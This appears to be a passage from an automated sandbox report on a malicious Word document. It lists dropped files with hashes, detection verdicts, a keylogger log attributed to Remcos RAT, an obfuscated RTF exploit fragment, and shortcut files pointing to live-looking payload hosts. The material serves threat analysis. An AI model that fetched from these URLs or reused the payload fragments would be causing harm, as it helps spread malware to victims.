                                                                                                                                SHA-512:3EBB6F881334115B52FC4F426A4F681B22645B967FA03BF367C43CD7BB078C74BBFB7F41ABBB6132429704CB6E338808468E607298B999B63C7D246DA03750F2
                                                                                                                                Malicious:false
                                                                                                                                Preview:....l............................E...U.. EMF.....@..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d.......n......._.......n...|.......!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Rich Text Format data, version 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):69247
                                                                                                                                Entropy (8bit):2.869208176365265
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:ZD+xsejlud5HY1ayCyu7OHAzlzjRYEX4Bo:ZGjE3qy7OglR9XWo
                                                                                                                                MD5:C9AC55D64A51738B57F065449C7E3911
                                                                                                                                SHA1:7B9DD5B4E76E99D711B0FE11582E6FF06D9CA830
                                                                                                                                SHA-256:8F76E86093D71F34C2E6F824984034185964F3D15C28DF1B61ADF5165FBB212E
                                                                                                                                SHA-512:6D78C5A5CFC7FA34942E87CEAE41D6E97DEBAA9469831FFBC4482C9FC1B531A171B1A12FE6FF3902B8919AEE94BDF619CD0B43DABA07166D9E47042A9EAF8E60
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, Author: ditekSHen
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:{\rtf1................{\*\lineFillHeight632699961 \;}.{\549664850?7.6_?`3084%_46]*?52[;?@?=+!^%?[?.?.1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[.14~9.?-#;'$,/=7!@'[[.30-2|8.:?)?%=[^8@|'<^+36.:].|;8..^+[*??/3.%7-6,%6._.??=(`.#$3-<%~8|.:?|&)...?84.@5|?;*'(_@.:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3..)@'.]?/.)[|/!%%)##&-;`'?4?].--9_=.!&%..~>,*?&7',#,..?|$!.'!.,.`_*=8_36_:%#?6%>.!`^3/`?*1@.&?8)`36:+[;.#?7`%.;$0&.!?@..--%6@<((`<.[+>*?;0+.7_?7]]`?%.:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=?.?4/97?.78]!2#.%?]=.&|8??&[*]7|%?.^??%]!?_-#>%%5?>|@=?.3`..3>58/?(8,2=?@|,.&?_?%;.4?4?@--?3&(..8.''5,~>~%-==/64|.4&%|3_.~~|@633)?.^8!767_&<%*>7.@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/.8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<..2*&|?[0#+).11%.-[9.:&|88<^>83?843)8&%/,[??<?1?(.'?/&4=0._.%0*<.+,]*)==]3?|`_.`.:|+*2`]2.&!332!!-%;.,!?=%6#(??9/:*&)<_#^|97*?+@?#?|)).?0:*6<:@0;|^?/8)?9&~:0(=6=,?[.4&/&1'`6$>?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;.#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5?

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Microsoft Corporation, Last Saved By: 91974, Name of Creating Application: Microsoft Excel, Last Printed: Mon Jul 15 16:30:47 2024, Create Time/Date: Mon Oct 21 12:03:58 1996, Last Saved Time/Date: Mon Sep 30 09:11:40 2024, Security: 0
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1921536
                                                                                                                                Entropy (8bit):5.05688819390453
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:rHmzCJEfXMGrc6/WCmzHJEAD3DERnLRmF8DUc3W7C:r1KzrcF1xbARM8Q2
                                                                                                                                MD5:5DB1D62AF529EB8960278533B4729E08
                                                                                                                                SHA1:C528EAF441753FF9F67A15D4D91411D9BBD89D6E
                                                                                                                                SHA-256:2F261B4AA19EE278CD2040BB7B890B861669EDEA4D7E0589807E766F86FDE545
                                                                                                                                SHA-512:BCBD933D1ECAAFB8E46DB8902F34C5BBFE81773BBCC88DB9E65899AE089FF6331C728356DE3BC404649D8DF239FCB861E56DD1077B6A4EA217ED25541EDD9F69
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Preview:......................>...............................................................................................................................................................~.......T........................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5FD5A5F2-1D5C-4618-A34F-9D73F6355FD3}.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1024
                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                Malicious:false
                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{81CF25BA-8165-4169-A374-0FA92F0DB92A}.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14336
                                                                                                                                Entropy (8bit):3.6223284944722915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Tn9A5iLnyrnKrIeGpzBC5BhTDBRLZDo1m6/nht7zRhACQe:ruMTMuI/pzAfZbZDg/nhtfXAze
                                                                                                                                MD5:1F0073F5EE9C6453AC9F83F07D55701E
                                                                                                                                SHA1:8873F9FC905685E63DD2C23FCA0888A46B95EF41
                                                                                                                                SHA-256:1FC1209AC2532AEB3FF2E9B890881174B197EAD249F097E733AEE1EBF3ADE984
                                                                                                                                SHA-512:3E1B3F0ADCFD639FB480AEB16B718DC4D2D1A3ACB4133C5786A142D4FA8692E714E82551BF26305F60D44108011431722A42266EB72B714FB330C755D9ACF25F
                                                                                                                                Malicious:false
                                                                                                                                Preview:....................4.9.6.6.4.8.5.0.?.7...6._.?.`.3.0.8.4.%._.4.6.].*.?.5.2.[.;.?.@.?.=.+.!.^.%.?.[.?...?...1.^.<.].*.&.1.?._.%.8.?.;.&.?...:.^.(.9.$._.`.'.%.?.@.^.`.?.4.^.&.[...1.4.~.9...?.-.#.;.'.$.,./.=.7.!.@.'.[.[...3.0.-.2.|.8...:.?.).?.%.=.[.^.8.@.|.'.<.^.+.3.6...:.]...|.;.8.....^.+.[.*.?.?./.3...%.7.-.6.,.%.6..._...?.?.=.(.`...#.$.3.-.<.%.~.8.|...:.?.|.&.).......?.8.4...@.5.|.?.;.*.'.(._.@...:.[.:.;./.!.+.1.>.(.+.%./.=.1.:./.,.$.4...?.-.$.|.&.5.3.%.|.?.@.2.?.).1.!.3.....).@.'...].?./...).[.|./.!.%.%.).#.#.&.-.;.`.'.?.4.?.]...-.-.9._.=...!.&.%.....~.>.,.*.?.&.7.'.,.#.,.....?.|.$.!...'.!...,...`._.*.=.8._.3.6._.:.%.#.?.6.%.>...!.`.^.3./.`.?.*.1.@...&.?.8.).`.3.6.:.+.[.;...#.?.7.`.%...;.$.0.&...!.?.@.....-.-.%.6.@.<.(.(.`.<...[.+.>.*.?.;.0.+...7._.?.7.].].`.?.%...:.;.?.[.+.(.,.$.%.1.1.<.?.`.3.%.=.^.7.?._.@.'.=.[.?.?.<.=.@.).=.?...?.4./.9.7.?...7.8.].!.2.#...%.?.].=...&.|.8.?.?.&.[.*.].7.|.%.?...^.?.?.%.].!.?._.-.#.>.%.%.5.?.>.|.@.=.?...3.`.....3.>.5.8./.?.(.8.,.2.=.?.@.|.,...&.?._.

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{82C924F8-1531-44C8-984D-EF01B5D2464E}.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1536
                                                                                                                                Entropy (8bit):2.8462879894458504
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:YXHH3HpkyKptyKpkyKptECbeT+dE/fd0Ivk2WWHsmXT7MTe2IXTesZSDMz:In3jK+KjKDrd8NvRsMXMHmyMz
                                                                                                                                MD5:8024A9B919C00968F5F9BBE6B6B6226B
                                                                                                                                SHA1:33A9B07B4709CAB429DB14CEA49A9B538305F51A
                                                                                                                                SHA-256:7CEB9E403F7C09773FC2646D85D42C6F97B0641B35BC74A2ACDBA6AF9AD7088E
                                                                                                                                SHA-512:CA97FF409D7F96DBB570C0FB03D21F0083A3349F72CBDF95EC04A70E9E868DC5D18BB5F8E43ADCAD068E6B003E5E2623C1D2F72785E9EC99F604E8DF03996579
                                                                                                                                Malicious:false
                                                                                                                                Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>...........................E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...8..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...5.4.=.5...5._.2.......................................................................................................................................................................................................t...v...x...z...~............................................................................................................................................................................................................................................................................................................................................................................................................d........gd........

                                                                                                                                C:\Users\user\AppData\Local\Temp\bhv76C6.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33900902, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21037056
                                                                                                                                Entropy (8bit):1.1388605313519755
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:wO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:wOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                MD5:C9619103D10C1CEF6B300ECF46CCD877
                                                                                                                                SHA1:3AB806432707666EB4986BB5D49F07DF62D0B265
                                                                                                                                SHA-256:C46F6583CA233D346F75245D38F152B142100C464CA3D987E9CF3F95F0924DEF
                                                                                                                                SHA-512:F6F82130CDBFB449EA8CD32B4E66B93668141DE768368C90BF4B1E32DE80E52CA5EBA2A38FD2BC7A88720D4F4550826B8F06353A18312C2BCD220BDC71469810
                                                                                                                                Malicious:false
                                                                                                                                Preview:3...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\bhvD395.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x33900902, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):21037056
                                                                                                                                Entropy (8bit):1.1388598365604055
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:w61U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:w6EXs1LuHqqEXwPW+RHA6m1fN
                                                                                                                                MD5:3AA8B4AA08B8C5FA0E70A5557BCDF29A
                                                                                                                                SHA1:0E12529B2C71FBE5AEA75CBEAAFA4278EB871EBD
                                                                                                                                SHA-256:265A917C59A79C9FE04C0220E35232E3E3A5C21FE71954C27EA06B005FFCC2B4
                                                                                                                                SHA-512:AC2676D59CB4F9F5FD1523FC9F511B9225B66E7148FBC1CB002856BA229E9B00E3E72D22E580384B2484FC210EFC1C8C28D7F10A7E16068E2B7E347C4505B10D
                                                                                                                                Malicious:false
                                                                                                                                Preview:3...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\h4t4iotl.ssy.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1

                                                                                                                                C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2
                                                                                                                                Entropy (8bit):1.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                Malicious:false
                                                                                                                                Preview:..

                                                                                                                                C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2
                                                                                                                                Entropy (8bit):1.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                Malicious:false
                                                                                                                                Preview:..

                                                                                                                                C:\Users\user\AppData\Local\Temp\nor\logs.dat

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370
                                                                                                                                Entropy (8bit):3.4900177446237195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:6lJLdCl55YcIeeDAl3PTpRsDRhOlGjSNombQOfxNa/WAv:6lJLCecZ/sDRhOlqyp50/W+
                                                                                                                                MD5:49E796EEA53B35DF89C84E7D65D2ECEC
                                                                                                                                SHA1:0EA83CDFAA996B1B5A64C80CCE528D810A82A11E
                                                                                                                                SHA-256:C7C2876C531508536302E4CBC4155C0D0B7EB5050B36DB85EE7827B7A22AA837
                                                                                                                                SHA-512:30F9BADED8645F665F04BC6F876276CE5BD1126F878A5ACE3E0623AE693D38C8CFA3F49C91DAD33EDE17FAE388DCF2413755498B4E818BA89F4947F33EEE02BD
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\nor\logs.dat, Author: Joe Security
                                                                                                                                Preview:....[.2.0.2.4./.1.0./.0.1. .0.3.:.2.5.:.3.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                C:\Users\user\AppData\Local\Temp\oxr44vl2.ryz.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1

                                                                                                                                C:\Users\user\AppData\Local\Temp\rm3mxia0.zqh.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1

                                                                                                                                C:\Users\user\AppData\Local\Temp\wvtwjsdr.dsi.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:very short file (no magic)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1
                                                                                                                                Entropy (8bit):0.0
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:U:U
                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                Malicious:false
                                                                                                                                Preview:1

                                                                                                                                C:\Users\user\AppData\Local\Temp\{2DD16B0F-AA0F-4ABE-B108-0EE03699B8F2}

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131072
                                                                                                                                Entropy (8bit):0.025585736770226363
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:I3DPcGt9SLHvxggLRt7rrarFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPFkPdrYvYg3J/
                                                                                                                                MD5:96B4A9294F62177682DC7D0240F723FA
                                                                                                                                SHA1:19CA0142B3D37A268759F6AE0A4B6FAD748B08A2
                                                                                                                                SHA-256:9EDE9C742D46B504FEB3888413A8B977A6229CD6FF9CEE1A3E263B380AC8407C
                                                                                                                                SHA-512:55272C88A37056AAC1043107FA3975B5B4549C6382C22BCF8574A1DD797D4D66D1C965E95F153657E71603EC7FA758AB3CC67A31C447105B59A48886B67FAFB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:......M.eFy...z...0Ay.O.X......S,...X.F...Fa.q.............................!.9.5.D...Y(...........z"....@..l...6.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\{E4F32ABF-7257-40F9-87F3-72A40DE1F3A9}

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131072
                                                                                                                                Entropy (8bit):0.025577196307894484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:I3DPcb5zxVvxggLRXy+gE3qMotRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQf7y+gYuvYg3J/
                                                                                                                                MD5:2B6A45709F67C046DDB5A17D7F36171C
                                                                                                                                SHA1:554EC1BE3FD1D3F2569433AFFF70C31E3281E40B
                                                                                                                                SHA-256:65D3CE86B193F2092D008CB2B7DC637B807719A4F36B9755A17AB6B9FF7332CB
                                                                                                                                SHA-512:835794624803B8F1CA3B4D6B2ACB8D0766B25FB5F0AAB932239C9204178D24B8303604E7DB64EF45873CDA0E3B9B812333279E9CEA5FCCD109664DDE8201F4B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:......M.eFy...z.b....F..=...xS,...X.F...Fa.q............................@|.....J......Jf........?,br.i.I.9_..........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9aubsm.url

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<https://og1.in/9aubsm>), ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):47
                                                                                                                                Entropy (8bit):4.681832468514788
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HRAbABGQYm2fjUeZQvn:HRYFVm4ofvn
                                                                                                                                MD5:3FA283841906814A11FA7ECA3C8A5D91
                                                                                                                                SHA1:4B441832B5E0636F64285031E20F37094EB8980B
                                                                                                                                SHA-256:8A502323B18AB1D652C3F59E42B68AE77AE8AEC41B9791064C4BF54A7363F73A
                                                                                                                                SHA-512:4B3E520E8C28C172854A9439AF126440B5BDA45566A9409C3D6DBDC02D30219FE7693D6979FBCD3D6A6498600FCA525A414C1C6E6667AEBD592B179F1C958D95
                                                                                                                                Malicious:true
                                                                                                                                Preview:[InternetShortcut]..URL=https://og1.in/9aubsm..

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RN on 104.168.7.8.url

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://104.168.7.8/510/RN/>), ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):52
                                                                                                                                Entropy (8bit):4.649878362697039
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HRAbABGQYm/GfLUSn:HRYFVm/5S
                                                                                                                                MD5:6F1AE91F5228D4A832D44D0D2BEAC6B0
                                                                                                                                SHA1:B9B81104C98627EBCEAB97B2E5DCA2DB8EC9F452
                                                                                                                                SHA-256:A7AA5478100D2C900E09DE788A09D5086E25F6B8AE7913F404E5AABEBA03E4AE
                                                                                                                                SHA-512:8F613DE90E375844310C23E4B28C8D31CF10BB241C5B802EA2D1927837A0D89CF73D41A5CB25921EF1D3146DC117B561E2C49AA83FD52A1ACF5B29731FFF2790
                                                                                                                                Malicious:true
                                                                                                                                Preview:[InternetShortcut]..URL=http://104.168.7.8/510/RN/..

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scan Order and Specification 01-10- 2024.LNK

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Tue Oct 1 06:25:02 2024, length=788500, window=hide
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1169
                                                                                                                                Entropy (8bit):4.577692199189722
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:8Jz/XT8RxONrsWPreqYe0YsWRDv3q/57u:8J/XTs0YWPrZmpW4/9u
                                                                                                                                MD5:032062D6565093F80A5BCF1EA2CD02A3
                                                                                                                                SHA1:C7F0DABFF7EABA8006AFE284F2A6B717B2F481C0
                                                                                                                                SHA-256:E68E0A9D49A6794CD20C9EE01C2A50F635F85455643F6E37CED522270DD9229A
                                                                                                                                SHA-512:A2AC3468D981450C6A41BE703D8D53A65EA9F1AC3533E6214DC241DC0CBDCF3813E78FCB660BDD7C618341DB705995594A268B0B3AEE24D78DB2DB419319CE64
                                                                                                                                Malicious:false
                                                                                                                                Preview:L..................F.... ....UB.r....UB.r...&"...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....AY.;..user.8......QK.XAY.;*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....AY"; .SCANOR~1.DOC..........WC..WC.*.........................S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Scan Order and Specification 01-10- 2024.docx.D.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n. .O.r.d.e.r. .a.n.d. .S.p.e.c.i.f.i.c.a.t.i.o.n. .0.1.-.1.0.-. .2.0.2.4...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
